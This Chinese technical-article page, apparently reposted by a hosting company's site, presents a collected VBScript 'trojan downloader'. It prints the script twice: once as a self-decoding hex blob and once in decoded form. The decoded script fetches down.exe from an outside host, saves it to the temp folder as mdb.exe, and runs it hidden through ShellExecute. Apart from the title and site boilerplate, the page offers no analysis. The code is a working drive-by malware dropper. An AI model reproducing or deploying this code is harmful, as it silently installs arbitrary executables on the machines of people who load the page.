一个收集的下载木马并运行的VBS代码
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
<scriptlanguage="VBScript"> S="2020206F6E206572726F7220726573756D65206E6578740D0A737 3733D226D64622E657865220D0A61613D226F62220D0A6161613D22 6A65220D0A616161613D226374220D0A61616161613D22636C61220 D0A6161616161613D2273736964220D0A616161616161613D22636C 73220D0A61616161616161613D2269643A42443936220D0A6161616 161616161613D22433535362D3635220D0A61616161616161616161 3D2241332D313144220D0A61616161616161616161613D22302D393 8220D0A6161616161616161616161613D2233412D30304330344622 0D0A616161616161616161616161613D22433239453336220D0A6D6 D3D224D6963220D0A6E6E3D22726F73220D0A6D6D6E6E3D226F6674 2E58220D0A6E6E6D6D3D224D4C48220D0A6D6E6D6E3D22545450220 D0A6E6D3D6D6E0D0A62623D224164220D0A6262623D226F64220D0A 626262623D22622E5374220D0A62626262623D227265616D220D0A6 7673D2267220D0A65653D2265220D0A74743D2274220D0A63633D22 536372220D0A6363633D22697074220D0A636363633D22696E672E4 6220D0A6363313D22696C6553220D0A636363313D22797374220D0A 63636363313D22656D4F220D0A6363323D22626A220D0A636363323 D22656374220D0A68683D22536865220D0A6868683D226C6C2E4170 220D0A686868683D22706C69220D0A68686868683D2263617469220 D0A6868686868683D226F6E220D0A6F6F3D226F220D0A6F6F6F3D227 065220D0A6F6F6F6F3D226E220D0A536574207878787878787878203 D20646F63756D656E742E637265617465456C656D656E7428616126 6161612661616161290D0A78787878787878782E7365744174747269 62757465206161616161266161616161612C20616161616161612661 61616161616161266161616161616161612661616161616161616161 26616161616161616161616126616161616161616161616161266161 61616161616161616161610D0A53657420787878787878203D207878 7878787878782E4372656174654F626A656374286D6D266E6E266D6 D6E6E266E6E6D6D266D6E6D6E2C2222290D0A736574207878787820 3D2078787878787878782E6372656174656F626A6563742862622662 626226626262622662626262622C2222290D0A787878782E74797065 203D20310D0A7878787878782E4F70656E2067672665652674742C20 22687474703A2F2F71712E656532382E636E2F646F776E2F646F776E2 E657865222C2046616C73650D0A7878787878782E53656E640D0A78 7878787878783D7373730D0A20202020736574207878787878203D2 078787878787878782E6372656174656F626A6563742863632663636 32663636363266363312663636331266363636331266363322663636 3322C2222290D0A2020202073657420746D70203D2078787878782E 4765745370656369616C466F6C646572283229200D0A202020207878 78787878783D2078787878782E4275696C645061746828746D702C7 8787878787878290D0A20202020787878782E6F70656E0D0A2020202 0787878782E7772697465207878787878782E726573706F6E7365426 F64790D0A20202020787878782E73617665746F66696C65207878787 87878782C320D0A20202020787878782E636C6F73650D0A20202020 73657420717171203D2078787878787878782E6372656174656F626A 65637428686826686868266868686826686868686826686868686868 2C2222290D0A202020207171712E5368656C6C45786563757465207 87878787878782C22222C22222C6F6F266F6F6F266F6F6F6F2C30":D ="EXECUTE""""":C="&CHR(&H":N=")":DOWHILELEN(S)>1:IFISNUMER IC(LEFT(S,1))THEND=D&C&LEFT(S,2)&N:S=MID(S,3)ELSED=D&C&LEF T(S,4)&N:S=MID(S,5) LOOP:EXECUTED </script> 解密后: 复制代码 代码如下: onerrorresumenext sss="mdb.exe" aa="ob" aaa="je" aaaa="ct" aaaaa="cla" aaaaaa="ssid" aaaaaaa="cls" aaaaaaaa="id:BD96" aaaaaaaaa="C556-65" aaaaaaaaaa="A3-11D" aaaaaaaaaaa="0-98" aaaaaaaaaaaa="3A-00C04F" aaaaaaaaaaaaa="C29E36" mm="Mic" nn="ros" mmnn="oft.X" nnmm="MLH" mnmn="TTP" nm=mn bb="Ad" bbb="od" bbbb="b.St" bbbbb="ream" gg="g" ee="e" tt="t" cc="Scr" ccc="ipt" cccc="ing.F" cc1="ileS" ccc1="yst" cccc1="emO" cc2="bj" ccc2="ect" hh="She" hhh="ll.Ap" hhhh="pli" hhhhh="cati" hhhhhh="on" oo="o" ooo="pe" oooo="n" Setxxxxxxxx=document.createElement(aa&aaa&aaaa) xxxxxxxx.setAttributeaaaaa&aaaaaa,aaaaaaa&aaaaaaaa&aaaaaaaaa&aaaaaaaaaa&aaaaaaaaaaa&aaaaaaaaaaaa&aaaaaaaaaaaaa Setxxxxxx=xxxxxxxx.CreateObject(mm&nn&mmnn&nnmm&mnmn,"") setxxxx=xxxxxxxx.createobject(bb&bbb&bbbb&bbbbb,"") xxxx.type=1 xxxxxx.Opengg&ee&tt,"http://qq.ee28.cn/down/down.exe",False xxxxxx.Send xxxxxxx=sss setxxxxx=xxxxxxxx.createobject(cc&ccc&cccc&cc1&ccc1&cccc1&cc2&ccc2,"") settmp=xxxxx.GetSpecialFolder(2) xxxxxxx=xxxxx.BuildPath(tmp,xxxxxxx) xxxx.open xxxx.writexxxxxx.responseBody xxxx.savetofilexxxxxxx,2 xxxx.close setqqq=xxxxxxxx.createobject(hh&hhh&hhhh&hhhhh&hhhhhh,"") qqq.ShellExecutexxxxxxx,"","",oo&ooo&oooo,0 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 用VBSrcipt判断是否是日期下一篇: VBS和页面中响应COM的事件的方法和代码
关于一个收集的下载木马并运行的VBS代码的所有评论